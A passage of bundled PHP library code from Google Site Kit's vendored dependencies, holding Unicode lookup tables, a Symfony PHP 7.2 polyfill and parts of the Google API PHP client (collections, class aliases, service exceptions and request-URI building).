917519 => \true, 917520 => \true, 917521 => \true, 917522 => \true, 917523 => \true, 917524 => \true, 917525 => \true, 917526 => \true, 917527 => \true, 917528 => \true, 917529 => \true, 917530 => \true, 917531 => \true, 917532 => \true, 917533 => \true, 917534 => \true, 917535 => \true, 983038 => \true, 983039 => \true, 1048574 => \true, 1048575 => \true, 1114110 => \true, 1114111 => \true); <?php namespace Google\Site_Kit_Dependencies; return array(173 => \true, 847 => \true, 6155 => \true, 6156 => \true, 6157 => \true, 8203 => \true, 8288 => \true, 8292 => \true, 65024 => \true, 65025 => \true, 65026 => \true, 65027 => \true, 65028 => \true, 65029 => \true, 65030 => \true, 65031 => \true, 65032 => \true, 65033 => \true, 65034 => \true, 65035 => \true, 65036 => \true, 65037 => \true, 65038 => \true, 65039 => \true, 65279 => \true, 113824 => \true, 113825 => \true, 113826 => \true, 113827 => \true, 917760 => \true, 917761 => \true, 917762 => \true, 917763 => \true, 917764 => \true, 917765 => \true, 917766 => \true, 917767 => \true, 917768 => \true, 917769 => \true, 917770 => \true, 917771 => \true, 917772 => \true, 917773 => \true, 917774 => \true, 917775 => \true, 917776 => \true, 917777 => \true, 917778 => \true, 917779 => \true, 917780 => \true, 917781 => \true, 917782 => \true, 917783 => \true, 917784 => \true, 917785 => \true, 917786 => \true, 917787 => \true, 917788 => \true, 917789 => \true, 917790 => \true, 917791 => \true, 917792 => \true, 917793 => \true, 917794 => \true, 917795 => \true, 917796 => \true, 917797 => \true, 917798 => \true, 917799 => \true, 917800 => \true, 917801 => \true, 917802 => \true, 917803 => \true, 917804 => \true, 917805 => \true, 917806 => \true, 917807 => \true, 917808 => \true, 917809 => \true, 917810 => \true, 917811 => \true, 917812 => \true, 917813 => \true, 917814 => \true, 917815 => \true, 917816 => \true, 917817 => \true, 917818 => \true, 917819 => \true, 917820 => \true, 917821 => \true, 917822 => \true, 917823 => \true, 917824 => \true, 917825 => \true, 917826 => \true, 917827 => \true, 917828 => \true, 917829 => \true, 917830 => \true, 917831 => \true, 917832 => \true, 917833 => \true, 917834 => \true, 917835 => \true, 917836 => \true, 917837 => \true, 917838 => \true, 917839 => \true, 917840 => \true, 917841 => \true, 917842 => \true, 917843 => \true, 917844 => \true, 917845 => \true, 917846 => \true, 917847 => \true, 917848 => \true, 917849 => \true, 917850 => \true, 917851 => \true, 917852 => \true, 917853 => \true, 917854 => \true, 917855 => \true, 917856 => \true, 917857 => \true, 917858 => \true, 917859 => \true, 917860 => \true, 917861 => \true, 917862 => \true, 917863 => \true, 917864 => \true, 917865 => \true, 917866 => \true, 917867 => \true, 917868 => \true, 917869 => \true, 917870 => \true, 917871 => \true, 917872 => \true, 917873 => \true, 917874 => \true, 917875 => \true, 917876 => \true, 917877 => \true, 917878 => \true, 917879 => \true, 917880 => \true, 917881 => \true, 917882 => \true, 917883 => \true, 917884 => \true, 917885 => \true, 917886 => \true, 917887 => \true, 917888 => \true, 917889 => \true, 917890 => \true, 917891 => \true, 917892 => \true, 917893 => \true, 917894 => \true, 917895 => \true, 917896 => \true, 917897 => \true, 917898 => \true, 917899 => \true, 917900 => \true, 917901 => \true, 917902 => \true, 917903 => \true, 917904 => \true, 917905 => \true, 917906 => \true, 917907 => \true, 917908 => \true, 917909 => \true, 917910 => \true, 917911 => \true, 917912 => \true, 917913 => \true, 917914 => \true, 917915 => \true, 917916 => \true, 917917 => \true, 917918 => \true, 917919 => \true, 917920 => \true, 917921 => \true, 917922 => \true, 917923 => \true, 917924 => \true, 917925 => \true, 917926 => \true, 917927 => \true, 917928 => \true, 917929 => \true, 917930 => \true, 917931 => \true, 917932 => \true, 917933 => \true, 917934 => \true, 917935 => \true, 917936 => \true, 917937 => \true, 917938 => \true, 917939 => \true, 917940 => \true, 917941 => \true, 917942 => \true, 917943 => \true, 917944 => \true, 917945 => \true, 917946 => \true, 917947 => \true, 917948 => \true, 917949 => \true, 917950 => \true, 917951 => \true, 917952 => \true, 917953 => \true, 917954 => \true, 917955 => \true, 917956 => \true, 917957 => \true, 917958 => \true, 917959 => \true, 917960 => \true, 917961 => \true, 917962 => \true, 917963 => \true, 917964 => \true, 917965 => \true, 917966 => \true, 917967 => \true, 917968 => \true, 917969 => \true, 917970 => \true, 917971 => \true, 917972 => \true, 917973 => \true, 917974 => \true, 917975 => \true, 917976 => \true, 917977 => \true, 917978 => \true, 917979 => \true, 917980 => \true, 917981 => \true, 917982 => \true, 917983 => \true, 917984 => \true, 917985 => \true, 917986 => \true, 917987 => \true, 917988 => \true, 917989 => \true, 917990 => \true, 917991 => \true, 917992 => \true, 917993 => \true, 917994 => \true, 917995 => \true, 917996 => \true, 917997 => \true, 917998 => \true, 917999 => \true); <?php /* namespace Google\Site_Kit_Dependencies intentionally removed */ /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ use Google\Site_Kit_Dependencies\Symfony\Polyfill\Php72 as p; if (\PHP_VERSION_ID >= 70200) { return; } if (!\defined('PHP_FLOAT_DIG')) { \define('PHP_FLOAT_DIG', 15); } if (!\defined('PHP_FLOAT_EPSILON')) { \define('PHP_FLOAT_EPSILON', 2.2204460492503E-16); } if (!\defined('PHP_FLOAT_MIN')) { \define('PHP_FLOAT_MIN', 2.2250738585072E-308); } if (!\defined('PHP_FLOAT_MAX')) { \define('PHP_FLOAT_MAX', 1.7976931348623157E+308); } if (!\defined('PHP_OS_FAMILY')) { \define('PHP_OS_FAMILY', \Google\Site_Kit_Dependencies\Symfony\Polyfill\Php72\Php72::php_os_family()); } if ('\\' === \DIRECTORY_SEPARATOR && !\function_exists('sapi_windows_vt100_support')) { function sapi_windows_vt100_support($stream, $enable = null) { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Php72\Php72::sapi_windows_vt100_support($stream, $enable); } } if (!\function_exists('stream_isatty')) { function stream_isatty($stream) { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Php72\Php72::stream_isatty($stream); } } if (!\function_exists('utf8_encode')) { function utf8_encode($string) { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Php72\Php72::utf8_encode($string); } } if (!\function_exists('utf8_decode')) { function utf8_decode($string) { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Php72\Php72::utf8_decode($string); } } if (!\function_exists('spl_object_id')) { function spl_object_id($object) { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Php72\Php72::spl_object_id($object); } } if (!\function_exists('mb_ord')) { function mb_ord($string, $encoding = null) { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Php72\Php72::mb_ord($string, $encoding); } } if (!\function_exists('mb_chr')) { function mb_chr($codepoint, $encoding = null) { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Php72\Php72::mb_chr($codepoint, $encoding); } } if (!\function_exists('mb_scrub')) { function mb_scrub($string, $encoding = null) { $encoding = null === $encoding ? \mb_internal_encoding() : $encoding; return \mb_convert_encoding($string, $encoding, $encoding); } } <?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Symfony\Polyfill\Php72; /** * @author Nicolas Grekas <p@tchwork.com> * @author Dariusz Rumiński <dariusz.ruminski@gmail.com> * * @internal */ final class Php72 { private static $hashMask; public static function utf8_encode($s) { $s .= $s; $len = \strlen($s); for ($i = $len >> 1, $j = 0; $i < $len; ++$i, ++$j) { switch (\true) { case $s[$i] < "\x80": $s[$j] = $s[$i]; break; case $s[$i] < "\xc0": $s[$j] = "\xc2"; $s[++$j] = $s[$i]; break; default: $s[$j] = "\xc3"; $s[++$j] = \chr(\ord($s[$i]) - 64); break; } } return \substr($s, 0, $j); } public static function utf8_decode($s) { $s = (string) $s; $len = \strlen($s); for ($i = 0, $j = 0; $i < $len; ++$i, ++$j) { switch ($s[$i] & "\xf0") { case "\xc0": case "\xd0": $c = \ord($s[$i] & "\x1f") << 6 | \ord($s[++$i] & "?"); $s[$j] = $c < 256 ? \chr($c) : '?'; break; case "\xf0": ++$i; // no break case "\xe0": $s[$j] = '?'; $i += 2; break; default: $s[$j] = $s[$i]; } } return \substr($s, 0, $j); } public static function php_os_family() { if ('\\' === \DIRECTORY_SEPARATOR) { return 'Windows'; } $map = ['Darwin' => 'Darwin', 'DragonFly' => 'BSD', 'FreeBSD' => 'BSD', 'NetBSD' => 'BSD', 'OpenBSD' => 'BSD', 'Linux' => 'Linux', 'SunOS' => 'Solaris']; return $map[\PHP_OS] ?? 'Unknown'; } public static function spl_object_id($object) { if (null === self::$hashMask) { self::initHashMask(); } if (null === ($hash = \spl_object_hash($object))) { return; } // On 32-bit systems, PHP_INT_SIZE is 4, return self::$hashMask ^ \hexdec(\substr($hash, 16 - (\PHP_INT_SIZE * 2 - 1), \PHP_INT_SIZE * 2 - 1)); } public static function sapi_windows_vt100_support($stream, $enable = null) { if (!\is_resource($stream)) { \trigger_error('sapi_windows_vt100_support() expects parameter 1 to be resource, ' . \gettype($stream) . ' given', \E_USER_WARNING); return \false; } $meta = \stream_get_meta_data($stream); if ('STDIO' !== $meta['stream_type']) { \trigger_error('sapi_windows_vt100_support() was not able to analyze the specified stream', \E_USER_WARNING); return \false; } // We cannot actually disable vt100 support if it is set if (\false === $enable || !self::stream_isatty($stream)) { return \false; } // The native function does not apply to stdin $meta = \array_map('strtolower', $meta); $stdin = 'php://stdin' === $meta['uri'] || 'php://fd/0' === $meta['uri']; return !$stdin && (\false !== \getenv('ANSICON') || 'ON' === \getenv('ConEmuANSI') || 'xterm' === \getenv('TERM') || 'Hyper' === \getenv('TERM_PROGRAM')); } public static function stream_isatty($stream) { if (!\is_resource($stream)) { \trigger_error('stream_isatty() expects parameter 1 to be resource, ' . \gettype($stream) . ' given', \E_USER_WARNING); return \false; } if ('\\' === \DIRECTORY_SEPARATOR) { $stat = @\fstat($stream); // Check if formatted mode is S_IFCHR return $stat ? 020000 === ($stat['mode'] & 0170000) : \false; } return \function_exists('posix_isatty') && @\posix_isatty($stream); } private static function initHashMask() { $obj = (object) []; self::$hashMask = -1; // check if we are nested in an output buffering handler to prevent a fatal error with ob_start() below $obFuncs = ['ob_clean', 'ob_end_clean', 'ob_flush', 'ob_end_flush', 'ob_get_contents', 'ob_get_flush']; foreach (\debug_backtrace(\PHP_VERSION_ID >= 50400 ? \DEBUG_BACKTRACE_IGNORE_ARGS : \false) as $frame) { if (isset($frame['function'][0]) && !isset($frame['class']) && 'o' === $frame['function'][0] && \in_array($frame['function'], $obFuncs)) { $frame['line'] = 0; break; } } if (!empty($frame['line'])) { \ob_start(); \debug_zval_dump($obj); self::$hashMask = (int) \substr(\ob_get_clean(), 17); } self::$hashMask ^= \hexdec(\substr(\spl_object_hash($obj), 16 - (\PHP_INT_SIZE * 2 - 1), \PHP_INT_SIZE * 2 - 1)); } public static function mb_chr($code, $encoding = null) { if (0x80 > ($code %= 0x200000)) { $s = \chr($code); } elseif (0x800 > $code) { $s = \chr(0xc0 | $code >> 6) . \chr(0x80 | $code & 0x3f); } elseif (0x10000 > $code) { $s = \chr(0xe0 | $code >> 12) . \chr(0x80 | $code >> 6 & 0x3f) . \chr(0x80 | $code & 0x3f); } else { $s = \chr(0xf0 | $code >> 18) . \chr(0x80 | $code >> 12 & 0x3f) . \chr(0x80 | $code >> 6 & 0x3f) . \chr(0x80 | $code & 0x3f); } if ('UTF-8' !== ($encoding = $encoding ?? \mb_internal_encoding())) { $s = \mb_convert_encoding($s, $encoding, 'UTF-8'); } return $s; } public static function mb_ord($s, $encoding = null) { if (null === $encoding) { $s = \mb_convert_encoding($s, 'UTF-8'); } elseif ('UTF-8' !== $encoding) { $s = \mb_convert_encoding($s, 'UTF-8', $encoding); } if (1 === \strlen($s)) { return \ord($s); } $code = ($s = \unpack('C*', \substr($s, 0, 4))) ? $s[1] : 0; if (0xf0 <= $code) { return ($code - 0xf0 << 18) + ($s[2] - 0x80 << 12) + ($s[3] - 0x80 << 6) + $s[4] - 0x80; } if (0xe0 <= $code) { return ($code - 0xe0 << 12) + ($s[2] - 0x80 << 6) + $s[3] - 0x80; } if (0xc0 <= $code) { return ($code - 0xc0 << 6) + $s[2] - 0x80; } return $code; } } <?php namespace Google\Site_Kit_Dependencies\Google; /** * Extension to the regular Google\Model that automatically * exposes the items array for iteration, so you can just * iterate over the object rather than a reference inside. */ class Collection extends \Google\Site_Kit_Dependencies\Google\Model implements \Iterator, \Countable { protected $collection_key = 'items'; /** @return void */ #[\ReturnTypeWillChange] public function rewind() { if (isset($this->{$this->collection_key}) && \is_array($this->{$this->collection_key})) { \reset($this->{$this->collection_key}); } } /** @return mixed */ #[\ReturnTypeWillChange] public function current() { $this->coerceType($this->key()); if (\is_array($this->{$this->collection_key})) { return \current($this->{$this->collection_key}); } } /** @return mixed */ #[\ReturnTypeWillChange] public function key() { if (isset($this->{$this->collection_key}) && \is_array($this->{$this->collection_key})) { return \key($this->{$this->collection_key}); } } /** @return mixed */ #[\ReturnTypeWillChange] public function next() { return \next($this->{$this->collection_key}); } /** @return bool */ #[\ReturnTypeWillChange] public function valid() { $key = $this->key(); return $key !== null && $key !== \false; } /** @return int */ #[\ReturnTypeWillChange] public function count() { if (!isset($this->{$this->collection_key})) { return 0; } return \count($this->{$this->collection_key}); } /** @return bool */ #[\ReturnTypeWillChange] public function offsetExists($offset) { if (!\is_numeric($offset)) { return parent::offsetExists($offset); } return isset($this->{$this->collection_key}[$offset]); } /** @return mixed */ #[\ReturnTypeWillChange] public function offsetGet($offset) { if (!\is_numeric($offset)) { return parent::offsetGet($offset); } $this->coerceType($offset); return $this->{$this->collection_key}[$offset]; } /** @return void */ #[\ReturnTypeWillChange] public function offsetSet($offset, $value) { if (!\is_numeric($offset)) { parent::offsetSet($offset, $value); } $this->{$this->collection_key}[$offset] = $value; } /** @return void */ #[\ReturnTypeWillChange] public function offsetUnset($offset) { if (!\is_numeric($offset)) { parent::offsetUnset($offset); } unset($this->{$this->collection_key}[$offset]); } private function coerceType($offset) { $keyType = $this->keyType($this->collection_key); if ($keyType && !\is_object($this->{$this->collection_key}[$offset])) { $this->{$this->collection_key}[$offset] = new $keyType($this->{$this->collection_key}[$offset]); } } } <?php namespace Google\Site_Kit_Dependencies; if (\class_exists('Google\\Site_Kit_Dependencies\\Google_Client', \false)) { // Prevent error with preloading in PHP 7.4 // @see https://github.com/googleapis/google-api-php-client/issues/1976 return; } $classMap = ['Google\\Site_Kit_Dependencies\\Google\\Client' => 'Google\Site_Kit_Dependencies\Google_Client', 'Google\\Site_Kit_Dependencies\\Google\\Service' => 'Google\Site_Kit_Dependencies\Google_Service', 'Google\\Site_Kit_Dependencies\\Google\\AccessToken\\Revoke' => 'Google\Site_Kit_Dependencies\Google_AccessToken_Revoke', 'Google\\Site_Kit_Dependencies\\Google\\AccessToken\\Verify' => 'Google\Site_Kit_Dependencies\Google_AccessToken_Verify', 'Google\\Site_Kit_Dependencies\\Google\\Model' => 'Google\Site_Kit_Dependencies\Google_Model', 'Google\\Site_Kit_Dependencies\\Google\\Utils\\UriTemplate' => 'Google\Site_Kit_Dependencies\Google_Utils_UriTemplate', 'Google\\Site_Kit_Dependencies\\Google\\AuthHandler\\Guzzle6AuthHandler' => 'Google\Site_Kit_Dependencies\Google_AuthHandler_Guzzle6AuthHandler', 'Google\\Site_Kit_Dependencies\\Google\\AuthHandler\\Guzzle7AuthHandler' => 'Google\Site_Kit_Dependencies\Google_AuthHandler_Guzzle7AuthHandler', 'Google\\Site_Kit_Dependencies\\Google\\AuthHandler\\AuthHandlerFactory' => 'Google\Site_Kit_Dependencies\Google_AuthHandler_AuthHandlerFactory', 'Google\\Site_Kit_Dependencies\\Google\\Http\\Batch' => 'Google\Site_Kit_Dependencies\Google_Http_Batch', 'Google\\Site_Kit_Dependencies\\Google\\Http\\MediaFileUpload' => 'Google\Site_Kit_Dependencies\Google_Http_MediaFileUpload', 'Google\\Site_Kit_Dependencies\\Google\\Http\\REST' => 'Google\Site_Kit_Dependencies\Google_Http_REST', 'Google\\Site_Kit_Dependencies\\Google\\Task\\Retryable' => 'Google\Site_Kit_Dependencies\Google_Task_Retryable', 'Google\\Site_Kit_Dependencies\\Google\\Task\\Exception' => 'Google\Site_Kit_Dependencies\Google_Task_Exception', 'Google\\Site_Kit_Dependencies\\Google\\Task\\Runner' => 'Google\Site_Kit_Dependencies\Google_Task_Runner', 'Google\\Site_Kit_Dependencies\\Google\\Collection' => 'Google\Site_Kit_Dependencies\Google_Collection', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Exception' => 'Google\Site_Kit_Dependencies\Google_Service_Exception', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Resource' => 'Google\Site_Kit_Dependencies\Google_Service_Resource', 'Google\\Site_Kit_Dependencies\\Google\\Exception' => 'Google\Site_Kit_Dependencies\Google_Exception']; foreach ($classMap as $class => $alias) { \class_alias($class, $alias); } /** * This class needs to be defined explicitly as scripts must be recognized by * the autoloader. */ class Google_Task_Composer extends \Google\Site_Kit_Dependencies\Google\Task\Composer { } /** @phpstan-ignore-next-line */ if (\false) { class Google_AccessToken_Revoke extends \Google\Site_Kit_Dependencies\Google\AccessToken\Revoke { } class Google_AccessToken_Verify extends \Google\Site_Kit_Dependencies\Google\AccessToken\Verify { } class Google_AuthHandler_AuthHandlerFactory extends \Google\Site_Kit_Dependencies\Google\AuthHandler\AuthHandlerFactory { } class Google_AuthHandler_Guzzle6AuthHandler extends \Google\Site_Kit_Dependencies\Google\AuthHandler\Guzzle6AuthHandler { } class Google_AuthHandler_Guzzle7AuthHandler extends \Google\Site_Kit_Dependencies\Google\AuthHandler\Guzzle7AuthHandler { } class Google_Client extends \Google\Site_Kit_Dependencies\Google\Client { } class Google_Collection extends \Google\Site_Kit_Dependencies\Google\Collection { } class Google_Exception extends \Google\Site_Kit_Dependencies\Google\Exception { } class Google_Http_Batch extends \Google\Site_Kit_Dependencies\Google\Http\Batch { } class Google_Http_MediaFileUpload extends \Google\Site_Kit_Dependencies\Google\Http\MediaFileUpload { } class Google_Http_REST extends \Google\Site_Kit_Dependencies\Google\Http\REST { } class Google_Model extends \Google\Site_Kit_Dependencies\Google\Model { } class Google_Service extends \Google\Site_Kit_Dependencies\Google\Service { } class Google_Service_Exception extends \Google\Site_Kit_Dependencies\Google\Service\Exception { } class Google_Service_Resource extends \Google\Site_Kit_Dependencies\Google\Service\Resource { } class Google_Task_Exception extends \Google\Site_Kit_Dependencies\Google\Task\Exception { } interface Google_Task_Retryable extends \Google\Site_Kit_Dependencies\Google\Task\Retryable { } class Google_Task_Runner extends \Google\Site_Kit_Dependencies\Google\Task\Runner { } class Google_Utils_UriTemplate extends \Google\Site_Kit_Dependencies\Google\Utils\UriTemplate { } } <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Service; use Google\Site_Kit_Dependencies\Google\Exception as GoogleException; class Exception extends \Google\Site_Kit_Dependencies\Google\Exception { /** * Optional list of errors returned in a JSON body of an HTTP error response. */ protected $errors = []; /** * Override default constructor to add the ability to set $errors and a retry * map. * * @param string $message * @param int $code * @param Exception|null $previous * @param array<array<string,string>>|null $errors List of errors returned in an HTTP * response or null. Defaults to []. */ public function __construct($message, $code = 0, ?\Google\Site_Kit_Dependencies\Google\Service\Exception $previous = null, $errors = []) { if (\version_compare(\PHP_VERSION, '5.3.0') >= 0) { parent::__construct($message, $code, $previous); } else { parent::__construct($message, $code); } $this->errors = $errors; } /** * An example of the possible errors returned. * * [ * { * "domain": "global", * "reason": "authError", * "message": "Invalid Credentials", * "locationType": "header", * "location": "Authorization", * } * ] * * @return array<array<string,string>>|null List of errors returned in an HTTP response or null. */ public function getErrors() { return $this->errors; } } <?php /** * Copyright 2010 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Service; use Google\Site_Kit_Dependencies\Google\Exception as GoogleException; use Google\Site_Kit_Dependencies\Google\Http\MediaFileUpload; use Google\Site_Kit_Dependencies\Google\Model; use Google\Site_Kit_Dependencies\Google\Utils\UriTemplate; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request; /** * Implements the actual methods/resources of the discovered Google API using magic function * calling overloading (__call()), which on call will see if the method name (plus.activities.list) * is available in this service, and if so construct an apiHttpRequest representing it. * */ class Resource { // Valid query parameters that work, but don't appear in discovery. private $stackParameters = ['alt' => ['type' => 'string', 'location' => 'query'], 'fields' => ['type' => 'string', 'location' => 'query'], 'trace' => ['type' => 'string', 'location' => 'query'], 'userIp' => ['type' => 'string', 'location' => 'query'], 'quotaUser' => ['type' => 'string', 'location' => 'query'], 'data' => ['type' => 'string', 'location' => 'body'], 'mimeType' => ['type' => 'string', 'location' => 'header'], 'uploadType' => ['type' => 'string', 'location' => 'query'], 'mediaUpload' => ['type' => 'complex', 'location' => 'query'], 'prettyPrint' => ['type' => 'string', 'location' => 'query']]; /** @var string $rootUrlTemplate */ private $rootUrlTemplate; /** @var \Google\Client $client */ private $client; /** @var string $serviceName */ private $serviceName; /** @var string $servicePath */ private $servicePath; /** @var string $resourceName */ private $resourceName; /** @var array $methods */ private $methods; public function __construct($service, $serviceName, $resourceName, $resource) { $this->rootUrlTemplate = $service->rootUrlTemplate ?? $service->rootUrl; $this->client = $service->getClient(); $this->servicePath = $service->servicePath; $this->serviceName = $serviceName; $this->resourceName = $resourceName; $this->methods = \is_array($resource) && isset($resource['methods']) ? $resource['methods'] : [$resourceName => $resource]; } /** * TODO: This function needs simplifying. * * @template T * @param string $name * @param array $arguments * @param class-string<T> $expectedClass - optional, the expected class name * @return mixed|T|ResponseInterface|RequestInterface * @throws \Google\Exception */ public function call($name, $arguments, $expectedClass = null) { if (!isset($this->methods[$name])) { $this->client->getLogger()->error('Service method unknown', ['service' => $this->serviceName, 'resource' => $this->resourceName, 'method' => $name]); throw new \Google\Site_Kit_Dependencies\Google\Exception("Unknown function: " . "{$this->serviceName}->{$this->resourceName}->{$name}()"); } $method = $this->methods[$name]; $parameters = $arguments[0]; // postBody is a special case since it's not defined in the discovery // document as parameter, but we abuse the param entry for storing it. $postBody = null; if (isset($parameters['postBody'])) { if ($parameters['postBody'] instanceof \Google\Site_Kit_Dependencies\Google\Model) { // In the cases the post body is an existing object, we want // to use the smart method to create a simple object for // for JSONification. $parameters['postBody'] = $parameters['postBody']->toSimpleObject(); } elseif (\is_object($parameters['postBody'])) { // If the post body is another kind of object, we will try and // wrangle it into a sensible format. $parameters['postBody'] = $this->convertToArrayAndStripNulls($parameters['postBody']); } $postBody = (array) $parameters['postBody']; unset($parameters['postBody']); } // TODO: optParams here probably should have been // handled already - this may well be redundant code. if (isset($parameters['optParams'])) { $optParams = $parameters['optParams']; unset($parameters['optParams']); $parameters = \array_merge($parameters, $optParams); } if (!isset($method['parameters'])) { $method['parameters'] = []; } $method['parameters'] = \array_merge($this->stackParameters, $method['parameters']); foreach ($parameters as $key => $val) { if ($key != 'postBody' && !isset($method['parameters'][$key])) { $this->client->getLogger()->error('Service parameter unknown', ['service' => $this->serviceName, 'resource' => $this->resourceName, 'method' => $name, 'parameter' => $key]); throw new \Google\Site_Kit_Dependencies\Google\Exception("({$name}) unknown parameter: '{$key}'"); } } foreach ($method['parameters'] as $paramName => $paramSpec) { if (isset($paramSpec['required']) && $paramSpec['required'] && !isset($parameters[$paramName])) { $this->client->getLogger()->error('Service parameter missing', ['service' => $this->serviceName, 'resource' => $this->resourceName, 'method' => $name, 'parameter' => $paramName]); throw new \Google\Site_Kit_Dependencies\Google\Exception("({$name}) missing required param: '{$paramName}'"); } if (isset($parameters[$paramName])) { $value = $parameters[$paramName]; $parameters[$paramName] = $paramSpec; $parameters[$paramName]['value'] = $value; unset($parameters[$paramName]['required']); } else { // Ensure we don't pass nulls. unset($parameters[$paramName]); } } $this->client->getLogger()->info('Service Call', ['service' => $this->serviceName, 'resource' => $this->resourceName, 'method' => $name, 'arguments' => $parameters]); // build the service uri $url = $this->createRequestUri($method['path'], $parameters); // NOTE: because we're creating the request by hand, // and because the service has a rootUrl property // the "base_uri" of the Http Client is not accounted for $request = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request($method['httpMethod'], $url, $postBody ? ['content-type' => 'application/json'] : [], $postBody ? \json_encode($postBody) : ''); // support uploads if (isset($parameters['data'])) { $mimeType = isset($parameters['mimeType']) ? $parameters['mimeType']['value'] : 'application/octet-stream'; $data = $parameters['data']['value']; $upload = new \Google\Site_Kit_Dependencies\Google\Http\MediaFileUpload($this->client, $request, $mimeType, $data); // pull down the modified request $request = $upload->getRequest(); } // if this is a media type, we will return the raw response // rather than using an expected class if (isset($parameters['alt']) && $parameters['alt']['value'] == 'media') { $expectedClass = null; } // if the client is marked for deferring, rather than // execute the request, return the response if ($this->client->shouldDefer()) { // @TODO find a better way to do this $request = $request->withHeader('X-Php-Expected-Class', $expectedClass); return $request; } return $this->client->execute($request, $expectedClass); } protected function convertToArrayAndStripNulls($o) { $o = (array) $o; foreach ($o as $k => $v) { if ($v === null) { unset($o[$k]); } elseif (\is_object($v) || \is_array($v)) { $o[$k] = $this->convertToArrayAndStripNulls($o[$k]); } } return $o; } /** * Parse/expand request parameters and create a fully qualified * request uri. * @static * @param string $restPath * @param array $params * @return string $requestUrl */ public function createRequestUri($restPath, $params) { // Override the default servicePath address if the $restPath use a / if ('/' == \substr($restPath, 0, 1)) { $requestUrl = \substr($restPath, 1); } else { $requestUrl = $this->servicePath . $restPath; } if ($this->rootUrlTemplate) { // code for universe domain $rootUrl = \str_replace('UNIVERSE_DOMAIN', $this->client->getUniverseDomain(), $this->rootUrlTemplate); // code for leading slash if ('/' !== \substr($rootUrl, -1) && '/' !== \substr($requestUrl, 0, 1)) { $requestUrl = '/' . $requestUrl; } $requestUrl = $rootUrl . $requestUrl; } $uriTemplateVars = []; $queryVars = []; foreach ($params as $paramName => $paramSpec) { if ($paramSpec['type'] == 'boolean') { $paramSpec['value'] = $paramSpec['value'] ? 'true' : 'false'; } if ($paramSpec['location'] == 'path') { $uriTemplateVars[$paramName] = $paramSpec['value']; } elseif ($paramSpec['location'] == 'query') { if (\is_array($paramSpec['value'])) { foreach ($paramSpec['value'] as $value) { $queryVars[] = $paramName . '=' . \rawurlencode(\rawurldecode($value)); } } else { $queryVars[] = $paramName . '=' . \rawurlencode(\rawurldecode($paramSpec['value'])); } } } if (\count($uriTemplateVars)) { $uriTemplateParser = new \Google\Site_Kit_Dependencies\Google\Utils\UriTemplate(); $requestUrl = $uriTemplateParser->parse($requestUrl, $uriTemplateVars); } if (\count($queryVars)) { $requestUrl .= '?' . \implode('&', $queryVars); } return $requestUrl; } } <?php /* * Copyright 2010 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google; use BadMethodCallException; use DomainException; use Google\Site_Kit_Dependencies\Google\AccessToken\Revoke; use Google\Site_Kit_Dependencies\Google\AccessToken\Verify; use Google\Site_Kit_Dependencies\Google\Auth\ApplicationDefaultCredentials; use Google\Site_Kit_Dependencies\Google\Auth\Cache\MemoryCacheItemPool; use Google\Site_Kit_Dependencies\Google\Auth\Credentials\ServiceAccountCredentials; use Google\Site_Kit_Dependencies\Google\Auth\Credentials\UserRefreshCredentials; use Google\Site_Kit_Dependencies\Google\Auth\CredentialsLoader; use Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenCache; use Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\Google\Auth\OAuth2; use Google\Site_Kit_Dependencies\Google\AuthHandler\AuthHandlerFactory; use Google\Site_Kit_Dependencies\Google\Http\REST; use Google\Site_Kit_Dependencies\GuzzleHttp\Client as GuzzleClient; use Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface; use Google\Site_Kit_Dependencies\GuzzleHttp\Ring\Client\StreamHandler; use InvalidArgumentException; use LogicException; use Google\Site_Kit_Dependencies\Monolog\Handler\StreamHandler as MonologStreamHandler; use Google\Site_Kit_Dependencies\Monolog\Handler\SyslogHandler as MonologSyslogHandler; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; use Google\Site_Kit_Dependencies\Psr\Log\LoggerInterface; use UnexpectedValueException; /** * The Google API Client * https://github.com/google/google-api-php-client */ class Client { const LIBVER = "2.12.6"; const USER_AGENT_SUFFIX = 